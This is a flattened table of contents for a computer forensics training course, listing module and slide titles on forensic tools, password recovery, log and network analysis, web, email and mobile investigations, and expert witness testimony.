NTFS Partition Data Recovery GetDataBack EASEUS Partition Recovery Advanced Disk Recovery Power Data Recovery Remo Recover (Mac) - Pro Mac Data Recovery Software Quick Recovery for Linux Stellar Phoenix Linux Data Recovery Software Tools to Recover Deleted Partitions Demo - Partition Recovery Module 10 Review Module 11 - Forensics Investigation Using AccessData FTK Module Flow: Overview and Installation of FTK Overview of Forensic Toolkit (FTK) Features of FTK Software Requirement Configuration Option Database Installation (Cont'd) Database Installation FTK Application Installation (1 of 6) FTK Application Installation (2 of 6) FTK Application Installation (3 of 6) FTK Application Installation (4 of 6) FTK Application Installation (5 of 6) FTK Application Installation (6 of 6) Module Flow: FTK Case Manager User Interface Case Manager Window Case Manager Database Menu Setting Up Additional Users and Assigning Roles Case Manager Case Menu Assigning Users Shared Label Visibility Case Manager Tools Menu Recovering Processing Jobs Restoring an Image to a Disk Case Manager Manage Menu Managing Carvers Managing Custom Identifiers Module Flow: FTK Examiner User Interface FTK Examiner User Interface Menu Bar: File Menu Exporting Files Exporting Case Data to a Custom Content Image Exporting the Word List Menu Bar: Edit Menu 3h 9m Menu Bar: View Menu Menu Bar: Evidence Menu Menu Bar: Tools Menu Verifying Drive Image Integrity Demo - Verifying Image Integrity Mounting an Image to a Drive File List View Using Labels Creating and Applying a Label Module Flow: Starting with FTK Creating a case Selecting Detailed Options: Evidence Processing (Cont'd) Selecting Detailed Options: Evidence Processing Selecting Detailed Options: Fuzzy Hashing (Cont'd) Selecting Detailed Options: Fuzzy Hashing Selecting Detailed Options: Data Carving Selecting Detailed Options: Custom File Identification (Cont'd) Selecting Detailed Options: Custom File Identification Selecting Detailed Options: Evidence Refinement (Advanced) (Cont'd) Selecting Detailed Options: Evidence Refinement (Advanced) Selecting Detailed Options: Index Refinement (Advanced) (Cont'd) Selecting Detailed Options: Index Refinement (Advanced) Module Flow: FTK Interface Tabs Demo - FTK Imaging and Adding FTK Interface Tabs Explore Tab Overview Tab Email Tab Graphics Tab Bookmarks Tab Live Search Tabs Volatile Tab Demo - File Overview Tab Module Flow: Adding and Processing Static, Live, and Remote Evidence Adding Evidence to a Case Evidence Groups Acquiring Local Live Evidence FTK Role Requirements For Remote Acquisition Types of Remote Information Acquiring Data Remotely Using Remote Device Management System (RDMS) (Cont'd) Acquiring Data Remotely Using Remote Device Management System (RDMS) Imaging Drives Mounting and Unmounting a Device Module Flow: Using and Managing Filters Accessing Filter Tools Using Filters Customizing Filters Using Predefined Filters Demo - Filtering Module Flow: Using Index Search and Live Search Conducting an Index Search Selecting Index Search Options Viewing Index Search Results Documenting Search Results Conducting a Live Search: Live Text Search Conducting a Live Search: Live Hex Search Conducting a Live Search: Live Pattern Search Demo - Indexed and Live Searches Demo - FTK File Carving Module Flow: Decrypting EFS and other Encrypted Files Decrypting EFS Files and Folders Decrypting MS Office Files Viewing Decrypted Files Decrypting Domain Account EFS Files from Live Evidence (Cont'd) Decrypting Domain Account EFS Files from Live Evidence Decrypting Credant Files Decrypting Safeboot Files Demo - FTK File Encryption Module Flow: Working with Reports Creating a Report Entering Case Information Managing Bookmarks in a Report Managing Graphics in a Report Selecting a File Path List Adding a File Properties List Making Registry Selections Selecting the Report Output Options Customizing the Formatting of Reports Viewing and Distributing a Report Demo - Reporting Module 11 Review Module 12 - Forensics Investigation Using EnCase Module Flow: Overview of EnCase Forensic Official Licensed Content Provided by EnCase to EC-Council Overview of EnCase Forensic EnCase Forensic Features (Cont'd) EnCase Forensic Features EnCase Forensic Platform EnCase Forensic Modules (Cont'd) 3h 18m EnCase Forensic Modules Module Flow: Installing EnCase Forensic Minimum Requirements Installing the Examiner Installed Files Installing the EnCase Modules Configuring EnCase Configuring EnCase: Case Options Tab Configuring EnCase: Global Tab Configuring EnCase: Debug Tab Configuring EnCase: Colors Tab and Fonts Tab Configuring EnCase: EnScript Tab and Storage Paths Tab Sharing Configuration (INI) Files Module Flow: EnCase Interface Demo - EnCase Options Main EnCase Window System Menu Bar Toolbar Panes Overview (Cont'd) Panes Overview Tree Pane Table Pane Table Pane: Table Tab Table Pane: Report Tab Table Pane: Gallery Tab Table Pane: Timeline Tab Table Pane: Disk Tab and Code Tab View Pane (Cont'd) View Pane Filter Pane Filter Pane Tabs Creating a Filter Creating Conditions Status Bar Demo - EnCase Tabs and Views Module Flow: Case Management Overview of Case Structure Case Management Indexing a Case (Cont'd) Indexing a Case Case Backup Options Dialog Box Logon Wizard New Case Wizard Setting Time Zones for Case Files Setting Time Zone Options for Evidence Files Module Flow: Working with Evidence Types of Entries Adding a Device (Cont'd) Adding a Device Adding a Device using Tableau Write Blocker (Cont'd) Adding a Device using Tableau Write Blocker Performing a Typical Acquisition Acquiring a Device (Cont'd) Acquiring a Device Canceling an Acquisition Verifying Evidence Files Demo - Imaging with EnCase Delayed Loading of Internet Artifacts Hashing the Subject Drive Logical Evidence File (LEF) Creating a Logical Evidence File (Cont'd) Creating a Logical Evidence File Recovering Folders on FAT Volumes Restoring a Physical Drive Demo - Restoring a Drive from an Image Module Flow: Source Processor Source Processor Starting to Work with Source Processor Setting Case Options Collection Jobs Creating a Collection Job (Cont'd) Creating a Collection Job Copying a Collection Job Running a Collection Job (Cont'd) Running a Collection Job Analysis Jobs Creating an Analysis Job Running an Analysis Job (Cont'd) Running an Analysis Job Creating a Report (Cont'd) Creating a Report Demo - Enscripts Module Flow: Analyzing and Searching Files Viewing the File Signature Directory Performing a Signature Analysis Hash Analysis Hashing a New Case Demo - Signature Analysis and Hashing Creating a Hash Set Keyword Searches Creating Global Keywords Adding Keywords Importing and Exporting Keywords Searching Entries for Email and Internet Artifacts Viewing Search Hits Generating an Index Tag Records Demo - Keyword Searcher Module Flow: Viewing File Content Viewing Files Copying and Unerasing Files (Cont'd) Copying and Unerasing Files Adding a File Viewer Demo - Adding a File Viewer Viewing File Content Using View Pane Viewing Compound Files Viewing Base64 and UUE Encoded Files Demo - Compound Files Module Flow: Bookmarking Items Bookmarks Overview Creating a Highlighted Data Bookmark Creating a Note Bookmark Creating a Folder Information/Structure Bookmark Creating a Notable File Bookmark Creating a File Group Bookmark Creating a Log Record Bookmark Creating a Snapshot Bookmark Organizing Bookmarks Copying/Moving a Table Entry into a Folder Viewing a Bookmark on the Table Report Tab Excluding Bookmarks (Cont'd) Excluding Bookmarks Copying Selected Items from One Folder to Another Demo - Bookmarks Module Flow: Reporting Reporting Report User Interface Creating a Report Using the Report Tab Report Single/Multiple Files Viewing a Bookmark Report Viewing an Email Report Viewing a Webmail Report Viewing a Search Hits Report Creating a Quick Entry Report Creating an Additional Fields Report Exporting a Report Demo - Reporting Module 12 Review Module 13 - Steganography and Image File Forensics Module Flow: Steganography What is Steganography? How Steganography Works Legal Use of Steganography Unethical Use of Steganography Module Flow: Steganography Techniques Steganography Techniques Application of Steganography Classification of Steganography Technical Steganography Linguistic Steganography (Cont'd) Linguistic Steganography Types of Steganography Image Steganography Least Significant Bit Insertion Masking and Filtering Algorithms and Transformation Image Steganography: Hermetic Stego Steganography Tool: S-Tools Image Steganography Tools Audio Steganography Audio Steganography Methods (Cont'd) Audio Steganography Methods Audio Steganography: Mp3stegz Audio Steganography Tools Video Steganography Video Steganography: MSU StegoVideo Video Steganography Tools Document Steganography: wbStego Byte Shelter I Document Steganography Tools Whitespace Steganography Tool: SNOW Folder Steganography: Invisible Secrets 4 Demo - Invisible Secrets Folder Steganography Tools Spam/Email Steganography: Spam Mimic Steganographic File System Issues in Information Hiding Module Flow: Steganalysis 2h 11m Steganalysis How to Detect Steganography (Cont'd) How to Detect Steganography Detecting Text, Image, Audio, and Video Steganography (Cont'd) Detecting Text, Image, Audio, and Video Steganography Steganalysis Methods/Attacks on Steganography Disabling or Active Attacks Steganography Detection Tool: Stegdetect Steganography Detection Tools Demo - Steg Detection Module Flow: Image Files Image Files Common Terminologies Understanding Vector Images Understanding Raster Images Metafile Graphics Understanding Image File Formats GIF (Graphics Interchange Format) (Cont'd) GIF (Cont'd) GIF JPEG (Joint Photographic Experts Group) JPEG Files Structure (Cont'd) JPEG Files Structure JPEG 2000 BMP (Bitmap) File BMP File Structure PNG (Portable Network Graphics) PNG File Structure TIFF (Tagged Image File Format) TIFF File Structure (Cont'd) TIFF File Structure Module Flow: Data Compression Understanding Data Compression How Does File Compression Work? Lossless Compression Huffman Coding Algorithm (Cont'd) Huffman Coding Algorithm Lempel-Ziv Coding Algorithm (Cont'd) Lempel-Ziv Coding Algorithm Lossy Compression Vector Quantization Module Flow: Locating and Recovering Image Files Best Practices for Forensic Image Analysis Forensic Image Processing Using MATLAB Advantages of MATLAB MATLAB Screenshot Locating and Recovering Image Files Analyzing Image File Headers Repairing Damaged Headers (Cont'd) Repairing Damaged Headers Reconstructing File Fragments Identifying Unknown File Formats Identifying Image File Fragments Identifying Copyright Issues on Graphics Picture Viewer: IrfanView Picture Viewer: ACDSee Photo Manager 12 Picture Viewer: Thumbsplus Picture Viewer: AD Picture Viewer Lite Picture Viewer Max Picture Viewer: FastStone Image Viewer Picture Viewer: XnView Demo - Picture Viewers Faces - Sketch Software Digital Camera Data Discovery Software: File Hound Module Flow: Image File Forensics Tools Hex Workshop GFE Stealth - Forensics Graphics File Extractor Ilook Adroit Photo Forensics 2011 Digital Photo Recovery Digital Photo Recovery Screenshots Stellar Phoenix Photo Recovery Software Zero Assumption Recovery (ZAR) Photo Recovery Software Forensic Image Viewer File Finder DiskGetor Data Recovery DERescue Data Recovery Master Recover My Files Universal Viewer Module 13 Review Module 14 - Application Password Crackers Module Flow: Password Cracking Concepts Password - Terminology Password Types Password Cracker How Does a Password Cracker Work? How Hash Passwords are Stored in Windows SAM Module Flow: Types of Password Attacks 1h 8m Password Cracking Techniques Types of Password Attacks Passive Online Attacks: Wire Sniffing Password Sniffing Passive Online Attack: Man-in-the-Middle and Replay Attack Active Online Attack: Password Guessing Active Online Attack: Trojan/Spyware/keylogger Active Online Attack: Hash Injection Attack Rainbow Attacks: Pre-Computed Hash Distributed Network Attack Elcomsoft Distributed Password Recovery Non-Electronic Attacks Manual Password Cracking (Guessing) Automatic Password Cracking Algorithm Time Needed to Crack Passwords Classification of Cracking Software Systems Software vs. Applications Software Module Flow: System Software Password Cracking System Software Password Cracking Bypassing BIOS Passwords Using Manufacturer's Backdoor Password to Access the BIOS Using Password Cracking Software CmosPwd Resetting the CMOS using the Jumpers or Solder Beads Removing CMOS Battery Overloading the Keyboard Buffer and Using a Professional Service Tool to Reset Admin Password: Active@ Password Changer Tool to Reset Admin Password: Windows Key Module Flow: Application Software Password Cracking Passware Kit Forensic Accent Keyword Extractor Distributed Network Attack Password Recovery Bundle Advanced Office Password Recovery Office Password Recovery Office Password Recovery Toolbox Office Multi-document Password Cracker Word Password Recovery Master Accent WORD Password Recovery Word Password PowerPoint Password Recovery PowerPoint Password Powerpoint Key Stellar Phoenix Powerpoint Password Recovery Excel Password Recovery Master Accent EXCEL Password Recovery Excel Password Advanced PDF Password Recovery PDF Password Cracker PDF Password Cracker Pro Atomic PDF Password Recovery PDF Password Recover PDF Password Appnimi PDF Password Recovery Advanced Archive Password Recovery KRyLack Archive Password Recovery Zip Password Atomic ZIP Password Recovery RAR Password Unlocker Demo - Office Password Cracking Default Passwords http://www.defaultpassword.com http://www.cirt.net/passwords http://default-password.info http://www.defaultpassword.us http://www.passwordsdatabase.com http://www.virus.org Module Flow: Password Cracking Tools L0phtCrack OphCrack Cain & Abel RainbowCrack Windows Password Unlocker Windows Password Breaker SAMInside PWdump7 and Fgdump Password Cracking Tools Demo - System Password Cracking Module 14 Review Module 15 - Log Capturing and Event Correlation Module Flow: Computer Security Logs Computer Security Logs Operating System Logs Application Logs Security Software Logs Router Log Files Honeypot Logs Linux Process Accounting Logon Event in Windows 1h 23m Windows Log File Configuring Windows Logging Analyzing Windows Logs Windows Log File: System Logs Windows Log Files: Application Logs Logon Events that appear in the Security Event Log (Cont'd) Logon Events that appear in the Security Event Log Demo - Windows Event Viewer IIS Logs IIS Log File Format Maintaining Credible IIS Log Files Log File Accuracy Log Everything Keeping Time UTC Time View the DHCP Logs Sample DHCP Audit Log File ODBC Logging Module Flow: Logs and Legal Issues Legality of Using Logs (Cont'd) Legality of Using Logs Records of Regularly Conducted Activity as Evidence Laws and Regulations Module Flow: Log Management Log Management Functions of Log Management Challenges in Log Management Meeting the Challenges in Log Management Module Flow: Centralized Logging and Syslogs Centralized Logging Centralized Logging Architecture Steps to Implement Central Logging Syslog Syslog in Unix-Like Systems Steps to Set Up a Syslog Server for Unix Systems Advantages of Centralized Syslog Server IIS Centralized Binary Logging Module Flow: Time Synchronization Why Synchronize Computer Times? What is NTP? NTP Stratum Levels (Cont'd) NTP Stratum Levels NIST Time Servers (Cont'd) NIST Time Servers Configuring Time Server in Windows Server Module Flow: Event Correlation Event Correlation Types of Event Correlation Prerequisites for Event Correlation Event Correlation Approaches (Cont'd) Event Correlation Approaches Module Flow: Log Capturing and Analysis Tools GFI EventsManager GFI EventsManager Screenshot Activeworx Security Center EventLog Analyzer EventLog Analyzer Screenshot Syslog-ng OSE Syslog-ng Screenshot Kiwi Syslog Server Kiwi Syslog Server Screenshot WinSyslog Firewall Analyzer: Log Analysis Tool Firewall Analyzer Architecture Firewall Analyzer Screenshot Activeworx Log Center EventReporter Kiwi Log Viewer Event Log Explorer WebLog Expert XpoLog Center Suite XpoLog Center Suite Screenshot ELM Event Log Monitor EventSentry LogMeister LogViewer Pro WinAgents EventLog Translation Service EventTracker Enterprise Corner Bowl Log Manager Ascella Log Monitor Plus FLAG - Forensic and Log Analysis GUI FLAG Screenshot Simple Event Correlator (SEC) OSSEC Module 15 Review Module 16 - Network Forensics, Investigating Logs Module Flow: Network Forensics and Investigating Network Traffic Network Attack Statistics Network Forensics 1h 37m Network Forensics Analysis Mechanism Network Addressing Schemes Overview of Network Protocols Overview of Physical and Data-Link Layer of the OSI Model Overview of Network and Transport Layer of the OSI Model OSI Reference Model TCP/IP Protocol Intrusion Detection Systems (IDS) and Their Placement How IDS Works Types of Intrusion Detection Systems General Indications of Intrusions Firewall Honeypot Module Flow: Network Attacks Network Vulnerabilities Types of Network Attacks IP Address Spoofing Man-in-the-Middle Attack Packet Sniffing How a Sniffer Works Enumeration Denial of Service Attack Session Sniffing Buffer Overflow Trojan Horse Module Flow: Log Injection Attacks New Line Injection Attack New Line Injection Attack Countermeasure Separator Injection Attack (Cont'd) Separator Injection Attack Defending Separator Injection Attacks Timestamp Injection Attack (Cont'd) Timestamp Injection Attack Defending Timestamp Injection Attacks Word Wrap Abuse Attack Defending Word Wrap Abuse Attacks HTML Injection Attack Defending HTML Injection Attacks Terminal Injection Attack Defending Terminal Injection Attacks Module Flow: Investigating and Analyzing Logs Postmortem and Real-Time Analysis Where to Look for Evidence Log Capturing Tool: ManageEngine EventLog Analyzer Log Capturing Tool: ManageEngine Firewall Analyzer Log Capturing Tool: GFI EventsManager GFI EventsManager Screenshot Log Capturing Tool: Kiwi Syslog Server Kiwi Syslog Server Screenshot Handling Logs as Evidence Log File Authenticity Demo - Kiwi Log Viewer Use Signatures, Encryption, and Checksums Work with Copies Ensure System's Integrity Access Control Chain of Custody Condensing Log File Module Flow: Investigating Network Traffic Why Investigate Network Traffic? Evidence Gathering via Sniffing Capturing Live Data Packets Using Wireshark Wireshark Screenshot Display Filters in Wireshark Additional Wireshark Filters Demo - Wireshark Acquiring Traffic Using DNS Poisoning Techniques Intranet DNS Spoofing (Local Network) Intranet DNS Spoofing (Remote Network) Proxy Server DNS Poisoning DNS Cache Poisoning Evidence Gathering from ARP Table Evidence Gathering at the Data-Link Layer: DHCP Database Gathering Evidence by IDS Module Flow: Traffic Capturing and Analysis Tools NetworkMiner Tcpdump/Windump Intrusion Detection Tool: Snort How Snort Works IDS Policy Manager MaaTec Network Analyzer Iris Network Traffic Analyzer NetWitness Investigator NetWitness Investigator Screenshot Colasoft Capsa Network Analyzer Sniff - O - Matic NetResident Network Probe NetFlow Analyzer OmniPeek Network Analyzer Firewall Evasion Tool: Traffic IQ Professional NetworkView CommView Observer SoftPerfect Network Protocol Analyzer EffeTech HTTP Sniffer Big-Mother EtherDetect Packet Sniffer Ntop EtherApe Demo - Nmap AnalogX Packetmon IEInspector HTTP Analyzer SmartSniff Distinct Network Monitor Give Me Too EtherSnoop Show Traffic Argus Documenting the Evidence Gathered on a Network Module 16 Review Module 17 - Investigating Wireless Attacks Module Flow: Wireless Technologies Wi-Fi Usage Statistics in the US Wireless Networks Wireless Terminologies Wireless Components Types of Wireless Networks Wireless Standards MAC Filtering Service Set Identifier (SSID) Types of Wireless Encryption: WEP Types of Wireless Encryption: WPA Types of Wireless Encryption: WPA2 WEP vs. WPA vs. WPA2 Module Flow: Wireless Attacks Wi-Fi Chalking Wi-Fi Chalking Symbols Access Control Attacks (Cont'd) Access Control Attacks Integrity Attacks (Cont'd) Integrity Attacks Confidentiality Attacks (Cont'd) Confidentiality Attacks 2h 5m Availability Attacks (Cont'd) Availability Attacks Authentication Attacks (Cont'd) Authentication Attacks Module Flow: Investigating Wireless Attacks Key Points to Remember Steps for Investigation Obtain a Search Warrant Identify Wireless Devices at Crime Scene (Cont'd) Identify Wireless Devices at Crime Scene Search for Additional Devices Detect Rogue Access Point Document the Scene and Maintain a Chain of Custody Detect the Wireless Connections Methodologies to Detect Wireless Connections Wi-Fi Discovery Tool: inSSIDer GPS Mapping GPS Mapping Tool: WIGLE GPS Mapping Tool: Skyhook How to Discover Wi-Fi Networks Using Wardriving Check for MAC Filtering (Cont'd) Check for MAC Filtering Changing the MAC Address (Cont'd) Changing the MAC Address Detect WAPs Using the Nessus Vulnerability Scanner Capturing Wireless Traffic Sniffing Tool: Wireshark Follow TCP Stream in Wireshark Display Filters in Wireshark Additional Wireshark Filters Determine Wireless Field Strength: FSM Determine Wireless Field Strength: ZAP Checker Products What is Spectrum Analysis? Map Wireless Zones and Hotspots Connect to the Wireless Access Point (Cont'd) Connect to the Wireless Access Point Access Point Data Acquisition and Analysis: Attached Devices Access Point Data Acquisition and Analysis: LAN TCP/IP Setup Access Point Data Acquisition and Analysis Firewall Analyzer Firewall Log Analyzer Wireless Devices Data Acquisition and Analysis (Cont'd) Wireless Devices Data Acquisition and Analysis Report Generation Module Flow: Features of a Good Wireless Forensics Tool Features of a Good Wireless Forensics Tool (Cont'd) Features of a Good Wireless Forensics Tool Module Flow: Wireless Forensics Tools Wi-Fi Discovery Tool: NetStumbler Demo - inSSIDer NetStumbler Wi-Fi Discovery Tool: NetSurveyor Wi-Fi Discovery Tool: Vistumbler Wi-Fi Discovery Tool: WirelessMon Wi-Fi Discovery Tool: Kismet Wi-Fi Discovery Tool: AirPort Signal Wi-Fi Discovery Tools Wi-Fi Packet Sniffer: OmniPeek (Cont'd) Wi-Fi Packet Sniffer: OmniPeek Wi-Fi Packet Sniffer: CommView for WiFi Wi-Fi USB Dongle: AirPcap Wi-Fi Packet Sniffer: Wireshark with AirPcap Wi-Fi Packet Sniffer: tcpdump tcpdump Commands (Cont'd) tcpdump Commands Wi-Fi Packet Sniffer: KisMAC Aircrack-ng Suite Demo - AirCrack AirMagnet WiFi Analyzer Wardriving Tools RF Monitoring Tools Wi-Fi Connection Manager Tools Wi-Fi Traffic Analyzer Tools Wi-Fi Raw Packet Capturing Tools / Wi-Fi Spectrum Analyzing Tools Module 17 Review Module 18 - Investigating Web Attacks Module Flow: Introduction to Web Applications and Web Servers Web Application Security Statistics Webserver Market Shares Introduction to Web Applications Web Application Components How Web Applications Work Web Application Architecture Open Source Web Server Architecture Indications of a Web Attack Web Attack Vectors Why Web Servers are Compromised Impact of Web Server Attacks Website Defacement Case Study 2h 14m Module Flow: Web Logs Overview of Web Logs Application Logs Internet Information Services (IIS) Logs IIS Web Server Architecture IIS Log File Format Apache Web Server Logs DHCP Server Logs Module Flow: Web Attacks Web Attacks - 1 Web Attacks - 2 Unvalidated Input Parameter/Form Tampering Directory Traversal Security Misconfiguration Injection Flaws SQL Injection Attacks Command Injection Attacks Command Injection Example File Injection Attack What is LDAP Injection? How LDAP Injection Works Hidden Field Manipulation Attack Cross-Site Scripting (XSS) Attacks How XSS Attacks Work Cross-Site Request Forgery (CSRF) Attack How CSRF Attacks Work Web Application Denial-of-Service (DoS) Attack Denial of Service (DoS) Examples Buffer Overflow Attacks Cookie/Session Poisoning How Cookie Poisoning Works Session Fixation Attack Insufficient Transport Layer Protection Improper Error Handling Insecure Cryptographic Storage Broken Authentication and Session Management Unvalidated Redirects and Forwards DMZ Protocol Attack/ Zero Day Attack Log Tampering URL Interpretation and Impersonation Attack Web Services Attack Web Services Footprinting Attack Web Services XML Poisoning Web Server Misconfiguration Example HTTP Response Splitting Attack Web Cache Poisoning Attack HTTP Response Hijacking SSH Bruteforce Attack Man-in-the-Middle Attack Defacement Using DNS Compromise Module Flow: Web Attack Investigation Investigating Web Attacks Investigating Web Attacks in Windows-Based Servers (Cont'd) Investigating Web Attacks in Windows-Based Servers Investigating IIS Logs Investigating Apache Logs (Cont'd) Investigating Apache Logs Example of FTP Compromise Investigating FTP Servers Investigating Static and Dynamic IP Addresses Sample DHCP Audit Log File Investigating Cross-Site Scripting (XSS) (Cont'd) Investigating Cross-Site Scripting (XSS) Investigating SQL Injection Attacks (Cont'd) Investigating SQL Injection Attacks Pen-Testing CSRF Validation Fields Investigating Code Injection Attack Investigating Cookie Poisoning Attack Detecting Buffer Overflow Investigating Authentication Hijacking Web Page Defacement Investigating DNS Poisoning Intrusion Detection Security Strategies for Web Applications Checklist for Web Security Module Flow: Web Attack Detection Tools Demo - Nessus Web Application Security Tool: Acunetix Web Vulnerability Scanner Web Application Security Tool: Falcove Web Vulnerability Scanner Web Application Security Tool: Netsparker Web Application Security Tool: N-Stalker Web Application Security Scanner Web Application Security Tool: Sandcat Web Application Security Tool: Wikto Web Application Security Tools: WebWatchBot Web Application Security Tool: OWASP ZAP Web Application Security Tool: SecuBat Vulnerability Scanner Web Application Security Tool: Websecurify Web Application Security Tool: HackAlert Web Application Security Tool: WebCruiser Web Application Firewall: dotDefender Web Application Firewall: IBM AppScan Web Application Firewall: ServerDefender VP Web Log Viewer : Deep Log Analyzer Web Log Viewer: WebLog Expert Web Log Viewer: AlterWind Log Analyzer Web Log Viewer: Webalizer Web Log Viewer: eWebLog Analyzer Web Log Viewer: Apache Logs Viewer (ALV) Web Attack Investigation Tool: AWStats Web Attack Investigation Tools: Paros Proxy Web Attack Investigation Tools: Scrawlr Module Flow: Tools for Locating IP Addresses Whois Lookup (Cont'd) Whois Lookup Result SmartWhois ActiveWhois LanWhoIs CountryWhois CallerIP Real Hide IP Demo - Real Hide IP IP - Address Manager Pandora FMS Demo - Whois Lookup Module 18 Review Module 19 - Tracking Emails and Investigating Email Crimes Module Flow: Email System Basics Email Terminology Email System Email Clients Email Server SMTP Server POP3 and IMAP Servers Email Message Importance of Electronic Records Management Module Flow: Email Crimes Email Crime Email Spamming 1h 40m Mail Bombing/Mail Storm Phishing (Cont'd) Phishing Email Spoofing Crime via Chat Room Identity Fraud/Chain Letter Module Flow: Email Headers Example of Email Header List of Common Headers (Cont'd) List of Common Headers Module Flow: Steps to Investigate Why to Investigate Emails Investigating Email Crime and Violation Obtain a Search Warrant and Seize the Computer and Email Account Obtain a Bit-by-Bit Image of Email Information Examine Email Headers Viewing Email Headers in Microsoft Outlook Viewing Email Headers in AOL Viewing Email Headers in Hotmail Viewing Email Headers in Gmail Viewing Headers in Yahoo Mail Forging Headers Analyzing Email Headers (Cont'd) Analyzing Email Headers Email Header Fields Received: Headers Demo - Email Headers Microsoft Outlook Mail Examining Additional Files (.pst or .ost Files) Checking the Email Validity Examine the Originating IP Address Tracing Back Tracing Back Web-Based Email Email Archives Content of Email Archives Local Archive (Cont'd) Local Archive Server Storage Archive (Cont'd) Server Storage Archive Forensic Acquisition of Email Archive (Cont'd) Forensic Acquisition of Email Archive Deleted Email Recovery Module Flow: Email Forensics Tools Stellar Phoenix Deleted Email Recovery Recover My Email Outlook Express Recovery Zmeil Quick Recovery for MS Outlook Email Detective Email Trace - Email Tracking R-Mail FINALeMAIL eMailTrackerPro Forensic Tool Kit (FTK) Paraben's E-mail Examiner Paraben's Network E-mail Examiner DiskInternal's Outlook Express Repair Abuse.Net MailDetective Tool Module Flow: Laws and Acts against Email Crimes U.S. Laws Against Email Crime: CAN-SPAM Act (Cont'd) U.S. Laws Against Email Crime: CAN-SPAM Act 18 U.S.C. - 2252A 18 U.S.C. - 2252B Email Crime Law in Washington: RCW 19.190.020 Module 19 Review Module 20 - Mobile Forensics Module Flow: Mobile Phones Smartphone Sales Statistics 2010/2011 Mobile Phone Different Mobile Devices Hardware Characteristics of Mobile Devices Software Characteristics of Mobile Devices Components of Cellular Network Cellular Network Different Cellular Networks Module Flow: Mobile Operating Systems Mobile Operating Systems Types of Mobile Operating Systems webOS webOS System Architecture Symbian OS Symbian OS Architecture Android OS Android OS Architecture RIM Blackberry OS Windows Phone 7 Windows Phone 7 Architecture Apple iOS 1h 58m Module Flow: Mobile Forensics What a Criminal Can Do with Mobile Phones Mobile Forensics Mobile Forensics Challenges Forensics Information in Mobile Phones Memory Considerations in Mobiles Subscriber Identity Module (SIM) SIM File System Integrated Circuit Card Identification (ICCID) International Mobile Equipment Identifier (IMEI) Electronic Serial Number (ESN) Precautions to Be Taken Before Investigation (Cont'd) Precautions to Be Taken Before Investigation Module Flow: Mobile Forensics Process Mobile Forensics Process Collecting the Evidence Points to Remember while Collecting the Evidence Collecting an iPod/iPhone Connected to a Computer Demo - Mac-based iPods Demo - Windows-based iPods Document the Scene and Preserve the Evidence (Cont'd) Document the Scene and Preserve the Evidence Imaging and Profiling Acquire the Information Device Identification Acquire Data from SIM Cards (Cont'd) Acquire Data from SIM Cards Acquire Data from Unobstructed Mobile Devices Acquire the Data from Obstructed Mobile Devices Acquire Data from Memory Cards (Cont'd) Acquire Data from Memory Cards Acquire Data from Synched Devices Gather Data from Network Operator Check Call Data Records (CDRs) Gather Data from SQLite Record (Cont'd) Gather Data from SQLite Record Analyze the Information (Cont'd) Analyze the Information Generate Report Module Flow: Mobile Forensics Software Tools Oxygen Forensic Suite 2011 MOBILedit! Forensic MOBILedit! Forensic: Screenshot BitPim SIM Analyzer SIMCon SIM Card Data Recovery Memory Card Data Recovery Device Seizure SIM Card Seizure ART (Automatic Reporting Tool) iPod Data Recovery Software Recover My iPod PhoneView Elcomsoft Blackberry Backup Explorer Oxygen Phone Manager II Sanmaxi SIM Recoverer Mobile Forensics Tools Demo - Mobile Forensic Software Module Flow: Mobile Forensics Hardware Tools Secure View Kit Deployable Device Seizure (DDS) Paraben's Mobile Field Kit PhoneBase XACT System Logicube CellDEK Logicube CellDEK TEK RadioTactics ACESO UME-36Pro - Universal Memory Exchanger Cellebrite UFED System - Universal Forensic Extraction Device ZRT 2 ICD 5200 ICD 1300 Module 20 Review Module 21 - Investigative Reports Module Flow: Computer Forensics Report Computer Forensics Report Salient Features of a Good Report (Cont'd) Salient Features of a Good Report Aspects of a Good Report Module Flow: Computer Forensics Report Template Computer Forensics Report Template (Cont'd) Computer Forensics Report Template Simple Format of the Chain of Custody Document Chain of Custody Forms (Cont'd) Chain of Custody Forms Evidence Collection Form Computer Evidence Worksheet (Cont'd) Computer Evidence Worksheet 1h 16m Hard Drive Evidence Worksheet (Cont'd) Hard Drive Evidence Worksheet Removable Media Worksheet Module Flow: Investigative Report Writing Report Classification Layout of an Investigative Report Layout of an Investigative Report: Numbering Report Specifications Guidelines for Writing a Report Use of Supporting Material Importance of Consistency Investigative Report Format Attachments and Appendices Include Metadata Signature Analysis Investigation Procedures Collecting Physical and Demonstrative Evidence Collecting Testimonial Evidence Do's and Don'ts of Computer Forensics Investigations Case Report Writing and Documentation Creating a Report to Attach to the Media Analysis Worksheet Best Practices for Investigators Module Flow: Sample Forensics Report Sample Forensics Report Sample Forensics Report 1 (1 of 5) Sample Forensics Report 1 (2 of 5) Sample Forensics Report 1 (3 of 5) Sample Forensics Report 1 (4 of 5) Sample Forensics Report 1 (5 of 5) Sample Forensics Report 2 (1 of 3) Sample Forensics Report 2 (2 of 3) Sample Forensics Report 2 (3 of 3) Module Flow: Report Writing Using Tools Writing Report Using FTK (1 of 10) Writing Report Using FTK (2 of 10) Writing Report Using FTK (3 of 10) Writing Report Using FTK (4 of 10) Writing Report Using FTK (5 of 10) Writing Report Using FTK (6 of 10) Writing Report Using FTK (7 of 10) Writing Report Using FTK (8 of 10) Writing Report Using FTK (9 of 10) Writing Report Using FTK (10 of 10) Writing Report Using ProDiscover (1 of 7) Writing Report Using ProDiscover (2 of 7) Writing Report Using ProDiscover (3 of 7) Writing Report Using ProDiscover (4 of 7) Writing Report Using ProDiscover (5 of 7) Writing Report Using ProDiscover (6 of 7) Writing Report Using ProDiscover (7 of 7) Demo - Investigative Reports Module 21 Review Module 22 - Becoming an Expert Witness Module Flow: Expert Witness What is an Expert Witness? Role of an Expert Witness What Makes a Good Expert Witness? Module Flow: Types of Expert Witnesses Types of Expert Witnesses Computer Forensics Experts Role of Computer Forensics Expert Medical & Psychological Experts Civil Litigation Experts Construction & Architecture Experts Criminal Litigation Experts Module Flow: Scope of Expert Witness Testimony Scope of Expert Witness Testimony (Cont'd) Scope of Expert Witness Testimony Technical Witness vs. Expert Witness Preparing for Testimony Module Flow: Evidence Processing Evidence Preparation and Documentation Evidence Processing Steps (Cont'd) Evidence Processing Steps Checklists for Processing Evidence Examining Computer Evidence Prepare the Report Evidence Presentation Module Flow: Rules for Expert Witness Rules Pertaining to an Expert Witness's Qualifications (Cont'd) Rules Pertaining to an Expert Witness' Qualification Daubert Standard Frye Standard Importance of Resume Testifying in the Court The Order of Trial Proceedings Module Flow: General Ethics While Testifying General Ethics While Testifying Importance of Graphics 